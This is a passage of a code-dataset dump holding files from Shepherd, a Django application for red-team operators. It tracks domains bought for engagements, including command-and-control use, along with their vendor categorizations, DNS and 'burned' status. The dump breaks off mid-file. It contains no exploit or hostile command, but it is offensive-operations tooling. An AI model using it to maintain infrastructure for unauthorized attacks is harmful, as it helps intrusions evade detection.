DNS record type and then return\n a list.\n\n Parameters:\n domain The domain to be used for DNS record collection\n record_type The DNS record type to collect\n \"\"\"\n record = self.get_dns_record(domain, record_type)\n return self.parse_dns_answer(record)\n"
},
{
"alpha_fraction": 0.5582191944122314,
"alphanum_fraction": 0.568493127822876,
"avg_line_length": 12.318181991577148,
"blob_id": "6b42972b08b5a4239f00403bcca85f3fa3235134",
"content_id": "9a86eb5c77e505e312d21c6a50c0f694ab6cdf8a",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "TOML",
"length_bytes": 292,
"license_type": "permissive",
"max_line_length": 38,
"num_lines": 22,
"path": "/Pipfile",
"repo_name": "fastlorenzo/Shepherd",
"src_encoding": "UTF-8",
"text": "[[source]]\nurl = \"https://pypi.python.org/simple\"\nverify_ssl = true\nname = \"pypi\"\n\n[packages]\ndjango = \"*\"\ndjango-q = \"*\"\nredis = \"*\"\nbs4 = \"*\"\ncymon = \"*\"\nlxml = \"*\"\npillow = \"*\"\npytesseract = \"*\"\nrequests = \"*\"\ndnspython = \"*\"\n\n[dev-packages]\npylint = \"*\"\n\n[requires]\npython_version = \"3.7\""
},
{
"alpha_fraction": 0.5836313962936401,
"alphanum_fraction": 0.5912055373191833,
"avg_line_length": 58.043479919433594,
"blob_id": "03ef83b7cea46a66db62c2bf07339acf1933791f",
"content_id": "9bdb9527055c202f4501e37307fbdc6ff7e82178",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9506,
"license_type": "permissive",
"max_line_length": 225,
"num_lines": 161,
"path": "/catalog/migrations/0001_initial.py",
"repo_name": "fastlorenzo/Shepherd",
"src_encoding": "UTF-8",
"text": "# Generated by Django 2.1.5 on 2019-01-15 20:35\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='ActivityType',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('activity', models.CharField(help_text='Enter a reason for the use of the domain (e.g. command-and-control)', max_length=100, unique=True)),\n ],\n options={\n 'verbose_name': 'Domain activity',\n 'verbose_name_plural': 'Domain activities',\n 'ordering': ['activity'],\n },\n ),\n migrations.CreateModel(\n name='Client',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(help_text='Enter the name of the client', max_length=100, unique=True, verbose_name='Client Name')),\n ],\n options={\n 'verbose_name': 'Client',\n 'verbose_name_plural': 'Clients',\n 'ordering': ['name'],\n },\n ),\n migrations.CreateModel(\n name='Domain',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(help_text='Enter a domain name', max_length=100, unique=True, verbose_name='Name')),\n ('registrar', models.CharField(help_text='Enter the name of the registrar where this domain is registered', max_length=100, null=True, unique=True, verbose_name='Registrar')),\n ('dns_record', models.CharField(help_text='Enter domain DNS records', max_length=500, null=True, verbose_name='DNS Record')),\n ('health_dns', models.CharField(help_text='Domain health status based on passive DNS (e.g. 
Healthy, Burned)', max_length=100, null=True, verbose_name='DNS Health')),\n ('creation', models.DateField(help_text='Domain purchase date', verbose_name='Purchase Date')),\n ('expiration', models.DateField(help_text='Domain expiration date', verbose_name='Expiration Date')),\n ('all_cat', models.TextField(help_text='All categories applied to this domain', null=True, verbose_name='All Categories')),\n ('ibm_xforce_cat', models.CharField(help_text='Domain category as determined by IBM X-Force', max_length=100, null=True, verbose_name='IBM X-Force')),\n ('talos_cat', models.CharField(help_text='Domain category as determined by Cisco Talos', max_length=100, null=True, verbose_name='Cisco Talos')),\n ('bluecoat_cat', models.CharField(help_text='Domain category as determined by Bluecoat', max_length=100, null=True, verbose_name='Bluecoat')),\n ('fortiguard_cat', models.CharField(help_text='Domain category as determined by Fortiguard', max_length=100, null=True, verbose_name='Fortiguard')),\n ('opendns_cat', models.CharField(help_text='Domain category as determined by OpenDNS', max_length=100, null=True, verbose_name='OpenDNS')),\n ('trendmicro_cat', models.CharField(help_text='Domain category as determined by TrendMicro', max_length=100, null=True, verbose_name='TrendMicro')),\n ('mx_toolbox_status', models.CharField(help_text='Domain spam status as determined by MX Toolbox', max_length=100, null=True, verbose_name='MX Toolbox Status')),\n ('note', models.TextField(help_text='Domain-related notes, such as thoughts behind its purchase or how/why it was burned or retired', null=True, verbose_name='Notes')),\n ('burned_explanation', models.TextField(help_text='Reasons why the domain\\'s health status is not \"Healthy\"', null=True, verbose_name='Health Explanation')),\n ],\n options={\n 'verbose_name': 'Domain',\n 'verbose_name_plural': 'Domains',\n 'ordering': ['health_status', 'name'],\n 'permissions': (('can_retire_domain', 'Can retire a domain'), ('can_mark_reserved', 'Can reserve a domain')),\n },\n ),\n migrations.CreateModel(\n name='DomainStatus',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('domain_status', models.CharField(help_text='Domain status type (e.g. Available)', max_length=20, unique=True)),\n ],\n options={\n 'verbose_name': 'Domain status',\n 'verbose_name_plural': 'Domain statuses',\n 'ordering': ['domain_status'],\n },\n ),\n migrations.CreateModel(\n name='HealthStatus',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('health_status', models.CharField(help_text='Health status type (e.g. 
Healthy, Burned)', max_length=20, unique=True)),\n ],\n options={\n 'verbose_name': 'Health status',\n 'verbose_name_plural': 'Health statuses',\n 'ordering': ['health_status'],\n },\n ),\n migrations.CreateModel(\n name='History',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('start_date', models.DateField(auto_now_add=True, help_text='Enter the start date of the project', max_length=100, verbose_name='Start Date')),\n ('end_date', models.DateField(help_text='Enter the end date of the project', max_length=100, verbose_name='End Date')),\n ('note', models.TextField(help_text='Project-related notes, such as how the domain will be used/how it worked out', null=True, verbose_name='Notes')),\n ('slack_channel', models.CharField(help_text=\"Name of the Slack channel to be used for updates for this domain during the project's duration\", max_length=100, null=True, verbose_name='Project Slack Channel')),\n ('activity_type', models.ForeignKey(blank=True, on_delete=django.db.models.deletion.PROTECT, to='catalog.ActivityType')),\n ('client', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='catalog.Client')),\n ('domain', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='catalog.Domain')),\n ('operator', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'verbose_name': 'Historical project',\n 'verbose_name_plural': 'Historical projects',\n 'ordering': ['client', 'domain'],\n },\n ),\n migrations.CreateModel(\n name='ProjectType',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('project_type', models.CharField(help_text='Enter a project type (e.g. red team, penetration test)', max_length=100, unique=True, verbose_name='Project Type')),\n ],\n options={\n 'verbose_name': 'Project type',\n 'verbose_name_plural': 'Project types',\n 'ordering': ['project_type'],\n },\n ),\n migrations.CreateModel(\n name='WhoisStatus',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('whois_status', models.CharField(help_text='WHOIS privacy status (e.g. Enabled, Disabled)', max_length=20, unique=True)),\n ],\n options={\n 'verbose_name': 'WHOIS status',\n 'verbose_name_plural': 'WHOIS statuses',\n 'ordering': ['whois_status'],\n },\n ),\n migrations.AddField(\n model_name='history',\n name='project_type',\n field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='catalog.ProjectType'),\n ),\n migrations.AddField(\n model_name='domain',\n name='domain_status',\n field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.PROTECT, to='catalog.DomainStatus'),\n ),\n migrations.AddField(\n model_name='domain',\n name='health_status',\n field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.PROTECT, to='catalog.HealthStatus'),\n ),\n migrations.AddField(\n model_name='domain',\n name='last_used_by',\n field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL),\n ),\n migrations.AddField(\n model_name='domain',\n name='whois_status',\n field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.PROTECT, to='catalog.WhoisStatus'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.6676275134086609,
"alphanum_fraction": 0.6784922480583191,
"avg_line_length": 26.5060977935791,
"blob_id": "51b5cd42811f9b9074392c3a2823c3accad857dd",
"content_id": "7053b6d99334ca997b1c1c9f3f48e0c05d6fffd1",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4512,
"license_type": "permissive",
"max_line_length": 95,
"num_lines": 164,
"path": "/shepherd/settings.py",
"repo_name": "fastlorenzo/Shepherd",
"src_encoding": "UTF-8",
"text": "\"\"\"\nDjango settings for the Shepherd project.\n\nGenerated by 'django-admin startproject' using Django 2.1.4.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/2.1/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/2.1/ref/settings/\n\"\"\"\n\nimport os\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = 'changeme'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = False\n\nALLOWED_HOSTS = []\n\n# Application definition\n\nINSTALLED_APPS = [\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'catalog.apps.CatalogConfig',\n 'django_q',\n]\n\nMIDDLEWARE = [\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\nROOT_URLCONF = 'shepherd.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [\n os.path.join(BASE_DIR, 'templates'),\n ],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'shepherd.wsgi.application'\n\n# Database\n# https://docs.djangoproject.com/en/2.1/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n}\n\n# Password validation\n# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\n# Internationalization\n# https://docs.djangoproject.com/en/2.1/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/2.1/howto/static-files/\n\nSTATIC_URL = '/static/'\n\n# Redirect to home URL after login (Default redirects to /accounts/profile/)\nLOGIN_REDIRECT_URL = '/'\n\nEMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'\n\n# Django Q settings\n\n# Settings to be aware of:\n\n# save_limit: Limits the amount of successful tasks saved to Django. 
Set to 35 for roughly one\n# month of daily tasks and some domain check-ups.\n\n# timeout: The number of seconds a worker is allowed to spend on a task before it’s terminated.\n# Defaults to None, meaning it will never time out. Can be overridden for individual tasks. Not\n# set globally here because DNS and health checks can take a long time and will be different\n# for everyone.\nQ_CLUSTER = {\n 'name': 'shepherd',\n 'recycle': 500,\n 'save_limit': 35,\n 'queue_limit': 500,\n 'cpu_affinity': 1,\n 'label': 'Django Q',\n 'redis': {\n 'host': '127.0.0.1',\n 'port': 6379,\n 'db': 0, }\n}\n\n# DomainCheck configuration\n# Enter a VirusTotal API key (free or paid)\nDOMAINCHECK_CONFIG = {\n 'virustotal_api_key': '',\n 'sleep_time': 20,\n}\n\n# Slack configuration\nSLACK_CONFIG = {\n 'enable_slack': False,\n 'slack_emoji': ':sheep:',\n 'slack_channel': '#shepherd',\n 'slack_alert_target': '<@cmaddalena>',\n 'slack_username': 'Commander Shepherd',\n 'slack_webhook_url': 'https://hooks.slack.com/services/SLACK_WEBHOOK_ID'\n}"
},
{
"alpha_fraction": 0.6694915294647217,
"alphanum_fraction": 0.6694915294647217,
"avg_line_length": 44.38461685180664,
"blob_id": "b51b267b8008b93fefc5889947112af63fc1dff3",
"content_id": "fa776c504aa1a27b714c5d6273073f60ec0c688d",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2360,
"license_type": "permissive",
"max_line_length": 171,
"num_lines": 52,
"path": "/catalog/forms.py",
"repo_name": "fastlorenzo/Shepherd",
"src_encoding": "UTF-8",
"text": "\"\"\"This contains all of the forms for the catalog application.\"\"\"\n\nimport datetime\n\nfrom django import forms\nfrom django.forms import ModelForm\nfrom django.core.exceptions import ValidationError\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom catalog.models import Domain, HealthStatus, DomainStatus, ActivityType, ProjectType, Client, History\n\n\nclass DateInput(forms.DateInput):\n input_type = 'date'\n\n\nclass CheckoutForm(forms.Form):\n \"\"\"Form used for domain checkout. Updates the domain (status) and creates a project entry.\"\"\"\n client = forms.CharField(help_text='Enter a name for the client.')\n start_date = forms.DateField(help_text='Select a start date for the project.')\n end_date = forms.DateField(help_text='Select an end date for the project.')\n project_type = forms.ModelChoiceField(queryset=ProjectType.objects.all(), to_field_name='project_type', help_text='Select the type of project.')\n activity = forms.ModelChoiceField(queryset=ActivityType.objects.all(), to_field_name='activity', help_text='Select how this domain will be used.')\n note = forms.CharField(help_text='Enter a note, such as how this domain will be used.', widget=forms.Textarea, required=False)\n slack_channel = forms.CharField(help_text='Enter a Slack channel with the hashtag where notifications can be sent (e.g. #shepherd, with the hashtag).', required=False)\n\n class Meta:\n widgets = {\n 'start_date': forms.DateInput(attrs={'id': 'datepicker'}),\n 'end_date': forms.DateInput(attrs={'class': 'datepicker'})\n }\n\n def clean_end_date(self):\n \"\"\"Clean and sanitize user input.\"\"\"\n data = self.cleaned_data['end_date']\n # Check if a date is not in the past. \n if data < datetime.date.today():\n raise ValidationError(_('Invalid date: The provided end date is in past'))\n # Return the cleaned data.\n return data\n\n\nclass DomainCreateForm(forms.ModelForm):\n \"\"\"Form used with the DomainCreate CreateView in models.py to allow excluding fields.\"\"\"\n class Meta:\n \"\"\"Metadata for the model form.\"\"\"\n model = Domain\n exclude = ('last_used_by', 'burned_explanation')\n widgets = {\n 'creation': DateInput(),\n 'expiration': DateInput()\n }\n"
},
{
"alpha_fraction": 0.7798994779586792,
"alphanum_fraction": 0.7849246263504028,
"avg_line_length": 80.40908813476562,
"blob_id": "21bce22fdf7ad9a725c477d456279a8f0da02e6c",
"content_id": "3e56ded55e5fb0b30f1d8e8072a81659dbf62106",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 8955,
"license_type": "permissive",
"max_line_length": 578,
"num_lines": 110,
"path": "/README.md",
"repo_name": "fastlorenzo/Shepherd",
"src_encoding": "UTF-8",
"text": "# Shepherd\n\n[](.) [](.)\n\n\n\nShepherd is a Django application written in Python 3.7 and is designed to be used by a team of operators. It keeps track of domain names and each domain's current DNS settings, categorization, project history, and status. The tracked statuses include which domains are: ready to be used, burned/retired, or in use, and which team member checked out each of the active domains.\n\nMore information is available here: https://medium.com/@cmaddy/being-a-good-domain-shepherd-part-2-5e8597c3fe63\n\n## Installation\n\nShepherd requires Redis server and Python 3.7. Install these before proceeding. The exact steps will depend on your operating system, but should be as simple as using an `apt install` or `brew install` command.\n\n### Installing Libraries\n\nAll of Shepherd's Python/Django dependencies are documented in the Pipfile. It is easiest to setup and use a virtual environment using `pipenv`. This is the best option for managing the required libraries and to avoid Python installations getting mixed-up.\n\nDo this:\n\n1. Run: `pip3 install --user pipenv` or `python3 -m pip install --user pipenv`\n2. Run: `git clone https://github.com/GhostManager/Shepherd.git`\n3. Run: cd Shepherd && pipenv install\n4. Start using Shepherd by running: pipenv shell\n\n### Adjusting Settings.py\n\nOnce Django and the other Python libraries are installed, open Shepherd's settings.py file and direct your attention to the `SECRET_KEY` and `DEBUG` variables. You can set `DEBUG` to `True` if you want to test Shepherd or make some changes. It is a good idea to set this to `False` in production, even though Shepherd _should_ only be used as an internal resource.\n\nThe `SECRET_KEY` variable is set to `changeme`. Feel free to generate something and drop it in or use an environment variable. It's usually something like `cg#p$g+j9tax!#a3cup@1$8obt2_+&k3q+pmu)5%asj6yjpkag`.\n\n### Additional Settings\n\n#### API Configuration\n\nSettings.py also stores API information for a few functions. One of Shepherd's core features is updating domain \"health\" data (more on that below). This uses web requests and part of it uses the VirusTotal API. If you do not have one, get a free API key from VirusTotal. Once you have your key add it to the `DOMAINCHECK_CONFIG` settings.\n\nIf you have a paid VirusTotal license and are not subject to the 4 requests per minute limit you can play with the `sleep_time` setting. A 20 second `sleep_time` is still recommended to avoid spewing web requests so fast that your IP address gets blocked with reCAPTCHAs, but you can try reducing it.\n\n#### Slack Configuration\n\nThere is also a `SLACK_CONFIG` settings dictionary. If you have, or can get, a Slack Incoming Webhook you can configure that here to receive some messages when tasks are completed or domains are burned.\n\nYou can set a username and emoji for the bot. Emojis must be set using Slack syntax like `:sheep:`. The username can be anything you could use for a Slack username. The emoji will appear as the bot's avatar in channels.\n\nThe alert target is the message target. You can set this to a blank string, e.g. `''`, but it's mostly useful for targeting users, aliases, or @here/@channel. They must be written as `<!here>`, `<!channel>`, or `<@username>` for them to work as actual notification keywords.\n\nFinally, set the target channel. This might be your `#general` or some other channel. This is the global value that will be used for all messages unless another value is supplied. 
If you do not want to use Slack, change `enable_slack` to `False`.\n\nOther notification options are coming soon. Email and services such as Pushover are being considered.\n\n### Database Setup\n\nNext, the database tables must be migrated. This configures all of Shepherd's database models from the code in models.py to actual tables:\n\nTo set up the database run: `python3 manage.py migrate`\n\nAssuming that completed successfully, you need to pre-populate a few of Shepherd's database models with some data. These are just some basic domain statuses and project types. You can add your own as desired later.\n\nTo load the initial values run: `python3 manage.py loaddata catalog/fixtures/initial_values.json`\n\n### Start Django\n\nA superuser must now be created to access the admin panel and create new users and groups. This is the administrator of Shepherd, so set a strong password and document it in a password vault somewhere.\n\nTo create a superuser run: `python3 manage.py createsuperuser`\n\nFinally, try starting the server and accessing the admin panel.\n\nTo start the server run: `python3 manage.py runserver`\n\nVisit `SERVER_IP:8000/admin` to view the admin panel and log in using the superuser.\n\n### Creating New Users\n\nCreate your users using the admin panel. Filling out a complete profile is recommended.\n\nIn cases where Shepherd records a user action, usernames are used rather than first or last names, but Shepherd does display the user's full name in the corner if it is available. Also, usernames are weirdly case sensitive, so all lowercase is recommended to avoid confusion later.\n\nEmail addresses are not important at the present time, but this will change. Shepherd will use email addresses for password recovery, but an email server is not baked into Shepherd right now. Emails will just appear in the terminal and that is where the user or an administrator can get their password reset link.\n\nIn the future, email addresses will be displayed as a means of contacting the operator using a particular domain for domain and project questions. Email may also be used to send notifications.\n\n### Creating New Groups\n\nGroups are a good way to organize user permissions. Shepherd will make a couple of functions available to a \"Senior Operators\" group, including editing a domain's information. To use this functionality, create two groups named \"Operators\" and \"Senior Operators\" in the admin panel.\n\nOnly mark users as \"Staff\" if you want them to be able to access the Django admin panel. It is better to leave the admin panel alone for day-to-day work and it should not be required except to fix a problem or directly edit the database for some reason, so users do not require this access.\n
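If you would rather script this step, the same two groups can be created from a Django shell. This is a small sketch using Django's stock auth models; run `python3 manage.py shell` and enter:\n\n```python\nfrom django.contrib.auth.models import Group\n\n# Create the two groups Shepherd's permission checks expect,\n# skipping any group that already exists\nfor name in ('Operators', 'Senior Operators'):\n    Group.objects.get_or_create(name=name)\n```\n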
### Start Django Q and Redis\n\nOnce you are ready to actually use Shepherd, start your Redis server. You also need to start Django Q's `qcluster` in another terminal window with manage.py, just like starting the server.\n\nRun this: `python3 manage.py qcluster`\n\nIf Redis is running on a different server, you changed the port, or made some other modification, you will need to update the Redis configuration in settings.py. You could also switch to a different broker if you already have some other broker set up and would prefer to use it for Shepherd. Check Django Q's documentation to make the changes in settings.py to switch to RabbitMQ, Amazon SQS, or whatever else you might be using.\n\n### Schedule Tasks\n\nVisit the Django Q database from the admin panel and check the Scheduled tasks. You may wish to create a scheduled task to automatically release domains at the end of a project. Shepherd has a task for this, `tasks.release_domains`, which you can schedule whenever you please, like every morning at 01:00.\n\n## Notes on Health\n\nShepherd grades a domain's health as Healthy or Burned. Health is reported as an overall health grade and a separate grade for the domain's DNS. You will almost certainly see a `Healthy` domain with questionable DNS. This is not something to be worried about without some human investigation. The DNS grade is based on VirusTotal's passive DNS report and checking to see if the IP addresses have appeared in any threat reports. If you bought an expired domain, it's not at all strange to learn it once pointed at a cloud IP address that was flagged for something naughty at some point.\n\nCheck to see if the IP addresses in question are yours. If they are not, then you can probably ignore this. If the IP address was flagged very recently, like just before you bought the domain, then that may be a concern because the domain may be flagged for recent malicious activity. There's a lot of \"maybes\" here because this is very much an imperfect grade.\n\nIn general, focus on the overall health status (based on categories) and just use the passive DNS information and flags to help with manual analysis of your domains.\n"
},
{
"alpha_fraction": 0.4889705777168274,
"alphanum_fraction": 0.49816176295280457,
"avg_line_length": 22.65217399597168,
"blob_id": "07fef115c281a49f07e1f409542e285dd79ce789",
"content_id": "dcca4dba60b6cbd60301b4946e8c863f6684d526",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 544,
"license_type": "permissive",
"max_line_length": 59,
"num_lines": 23,
"path": "/catalog/templates/catalog/history_form.html",
"repo_name": "fastlorenzo/Shepherd",
"src_encoding": "UTF-8",
"text": "{% extends \"base_generic.html\" %}\n\n{% block pagetitle %}Manage History Entry{% endblock %}\n\n{% block content %}\n <style>\n th {\n background-color: #fafafa;\n color: black;\n }\n th:hover {background-color:#f5f5f5;}\n </style>\n <h2>Enter Project Details:</h2>\n <br />\n <form action=\"\" method=\"post\">\n {% csrf_token %}\n <table>\n {{ form.as_table }}\n </table>\n <br />\n <input type=\"submit\" class=\"button\" value=\"Submit\">\n </form>\n{% endblock %}\n"
},
{
"alpha_fraction": 0.597562313079834,
"alphanum_fraction": 0.5978887677192688,
"avg_line_length": 46.117950439453125,
"blob_id": "28c618e5963cb67a658bb6dbc7ce052977e39ec9",
"content_id": "5c9317087531cd2305227e2187f49b60d371b16f",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9189,
"license_type": "permissive",
"max_line_length": 134,
"num_lines": 195,
"path": "/tasks.py",
"repo_name": "fastlorenzo/Shepherd",
"src_encoding": "UTF-8",
"text": "\"\"\"This contains tasks to be run using Django Q and Redis.\"\"\"\n\n# Import the catalog application's models and settings\nfrom django.conf import settings\nfrom catalog.models import Domain, History, DomainStatus, HealthStatus\n\n# Import custom modules\nfrom modules.review import DomainReview\nfrom modules.dns import DNSCollector\n\n# Import Python libraries for various things\nimport json\nimport requests\nimport datetime\nfrom datetime import date\n\n\ndef send_slack_msg(message):\n \"\"\"Accepts message text and sends it to Slack. This requires Slack settings and a webhook be\n configured in the application's settings.\n\n Parameters:\n\n message A string to be sent as the Slack message\n \"\"\"\n try:\n enable_slack = settings.SLACK_CONFIG['enable_slack']\n except:\n enable_slack = False\n if enable_slack:\n try:\n slack_emoji = settings.SLACK_CONFIG['slack_emoji']\n slack_username = settings.SLACK_CONFIG['slack_username']\n slack_webhook_url = settings.SLACK_CONFIG['slack_webhook_url']\n slack_alert_target = settings.SLACK_CONFIG['slack_alert_target']\n slack_channel = settings.SLACK_CONFIG['slack_channel']\n slack_capable = True\n except Exception as error:\n slack_capable = False\n\n if slack_capable:\n message = slack_alert_target + ' ' + message\n slack_data = {\n 'username': slack_username, \n 'icon_emoji': slack_emoji, \n 'channel': slack_channel, \n 'text': message\n }\n response = requests.post(slack_webhook_url, data=json.dumps(slack_data), headers={'Content-Type':'application/json'})\n if response.status_code != 200:\n print('[!] Request to slack returned an error %s, the response is:\\n%s' % (response.status_code, response.text))\n\ndef send_slack_complete_msg(task):\n \"\"\"Function to send a Slack message for a task. Meant to be used as a hook for an async_task().\"\"\"\n if task.success:\n send_slack_msg('Task {} has completed its run. It completed successfully with no additional result data.'.format(task.name))\n else:\n if task.result:\n send_slack_msg('Task {} failed with this result: {}'.format(task.name, task.result))\n else:\n send_slack_msg('Task {} failed with no result/error data. Check the Django Q admin panel.'.format(task.name))\n\ndef release_domains(no_action=False):\n \"\"\"Pull all domains currently checked-out in Shepherd and update the status to Available if the\n project's end date is today or in the past.\n\n Parameters:\n\n no_action Defaults to False. 
Set to True to take no action and just return a list\n of domains that should be released now.\n \"\"\"\n domains_to_be_released = []\n # First get all domains set to `Unavailable`\n queryset = Domain.objects.filter(domain_status__domain_status='Unavailable')\n # Go through each `Unavailable` domain and check it against projects\n for domain in queryset:\n # Get all projects for the domain\n project_queryset = History.objects.filter(domain__name=domain.name)\n release_me = True\n # Check each project's end date to determine if all are in the past or not\n for project in project_queryset:\n if date.today() < project.end_date:\n release_me = False\n # If release_me is still true, release the domain\n if release_me:\n domains_to_be_released.append(domain)\n # Check no_action and just return list if it is set to True\n if no_action:\n return domains_to_be_released\n else:\n for domain in domains_to_be_released:\n print('Releasing {} back into the pool.'.format(domain.name))\n domain_instance = Domain.objects.get(name=domain.name)\n domain_instance.domain_status = DomainStatus.objects.get(domain_status='Available')\n domain_instance.save()\n return domains_to_be_released\n\ndef check_domains():\n \"\"\"Initiate a check of all domains in the Domain model and update each domain status.\"\"\"\n # Get all domains from the database\n domain_queryset = Domain.objects.all()\n domain_review = DomainReview(domain_queryset)\n lab_results = domain_review.check_domain_status()\n for domain in lab_results:\n try:\n # The `domain` is already a Domain object so this query might be unnecessary :thinking_emoji:\n domain_instance = Domain.objects.get(name=domain.name)\n # Flip status if a domain has been flagged as burned\n if lab_results[domain]['burned']:\n domain_instance.health_status = HealthStatus.objects.get(health_status='Burned')\n domain_instance.domain_status = DomainStatus.objects.get(domain_status='Burned')\n message = '*{}* has been flagged as burned because: {}'.format(domain.name, lab_results[domain]['burned_explanation'])\n if lab_results[domain]['categories']['bad']:\n message = message + ' (Bad categories: {})'.format(lab_results[domain]['categories']['bad'])\n send_slack_msg(message)\n # Update other fields for the domain object\n domain_instance.health_dns = lab_results[domain]['health_dns']\n domain_instance.burned_explanation = lab_results[domain]['burned_explanation']\n domain_instance.all_cat = lab_results[domain]['categories']['all']\n domain_instance.talos_cat = lab_results[domain]['categories']['talos']\n domain_instance.opendns_cat = lab_results[domain]['categories']['opendns']\n domain_instance.bluecoat_cat = lab_results[domain]['categories']['bluecoat']\n domain_instance.ibm_xforce_cat = lab_results[domain]['categories']['xforce']\n domain_instance.trendmicro_cat = lab_results[domain]['categories']['trendmicro']\n domain_instance.fortiguard_cat = lab_results[domain]['categories']['fortiguard']\n domain_instance.mx_toolbox_status = lab_results[domain]['categories']['mxtoolbox']\n domain_instance.save()\n except Exception as error:\n print('[!] Error updating \"{}\". 
Error: {}'.format(domain.name, error))\n pass\n\ndef update_dns():\n \"\"\"Initiate a check of all domains in the Domain model and update each domain's DNS records.\"\"\"\n dns_toolkit = DNSCollector()\n # Get all domains from the database\n domain_queryset = Domain.objects.all()\n for domain in domain_queryset:\n # Get each type of DNS record for the domain\n try:\n try:\n temp = []\n ns_records_list = dns_toolkit.get_dns_record(domain.name, 'NS')\n for rdata in ns_records_list.response.answer:\n for item in rdata.items:\n temp.append(item.to_text())\n ns_records = ', '.join(x.strip('.') for x in temp)\n except:\n ns_records = 'None'\n try:\n temp = []\n a_records = dns_toolkit.get_dns_record(domain.name, 'A')\n for rdata in a_records.response.answer:\n for item in rdata.items:\n temp.append(item.to_text())\n a_records = ', '.join(temp)\n except:\n a_records = None\n try:\n mx_records = dns_toolkit.return_dns_record_list(domain.name, 'MX')\n except:\n mx_records = None\n try:\n txt_records = dns_toolkit.return_dns_record_list(domain.name, 'TXT')\n except:\n txt_records = None\n try:\n soa_records = dns_toolkit.return_dns_record_list(domain.name, 'SOA')\n except:\n soa_records = None\n try:\n dmarc_record = dns_toolkit.return_dns_record_list('_dmarc.' + domain.name, 'TXT')\n except:\n dmarc_record = None\n # Assemble the string to be stored in the database\n dns_records_string = ''\n if ns_records:\n dns_records_string += 'NS: %s ::: ' % ns_records\n if a_records:\n dns_records_string += 'A: %s ::: ' % a_records\n if 